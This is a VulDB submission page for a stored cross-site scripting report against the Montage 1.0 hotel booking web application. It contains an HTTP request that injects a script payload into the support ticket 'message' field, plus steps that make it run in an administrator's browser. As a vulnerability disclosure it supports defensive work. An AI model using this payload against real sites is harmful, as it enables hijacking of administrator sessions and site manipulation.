ଜମା କରନ୍ତୁ #181818: Montage 1.0 Hotel Booking & Property Selling - Stored XSSସୂଚନା

ଶୀର୍ଷକMontage 1.0 Hotel Booking & Property Selling - Stored XSS
ବର୍ଣ୍ଣନା# Exploit Title: Montage 1.0 Hotel Booking & Property Selling - Stored XSS # Exploit Author: skalvin aka (CraCkEr) # Date: 13/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/montage-a-complete-solution-for-hotel-booking-property-selling/16 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /montage/user/ticket/create POST parameter 'message' is vulnerable to XSS ----------------------------------------------------------- POST /montage/user/ticket/create HTTP/2 Content-Disposition: form-data; name="subject" Anything ----------------------------------------------------------- Content-Disposition: form-data; name="message" <script>alert(1)</script> ----------------------------------------------------------- ## Steps to Reproduce: 1. Login as a (Normal User) 2. in User [Dashboard] Click on [Support Ticket] on this Path: https://website/montage/user/ticket 3. Click on [Create Ticket] on this Path: https://website/montage/user/ticket/create 4. Enter Any Subject 5. Inject your XSS Payload in [Message Box] 6. Click on [Submit] 8. When ADMIN visit [SUPPORT TICKETS] on this Path: https://website/montage/admin/tickets and Open the [New Pending Ticket] 9. XSS Will Fire and Executed on his Browser [-] Done
ଉପଭୋକ୍ତା
 skalvin (UID 49463)
ଦାଖଲ07/13/2023 12:15 AM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର07/21/2023 10:43 PM (9 days later)
ସ୍ଥିତିଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି235159 [Bug Finder Montage 1.0 Ticket /user/ticket/create ବାର୍ତ୍ତା କ୍ରସ୍ ସାଇଟ୍ ସ୍କ୍ରିପ୍ଟିଂ]
ପଏଣ୍ଟ17

Do you want to use VulDB in your project?

Use the official API to access entries easily!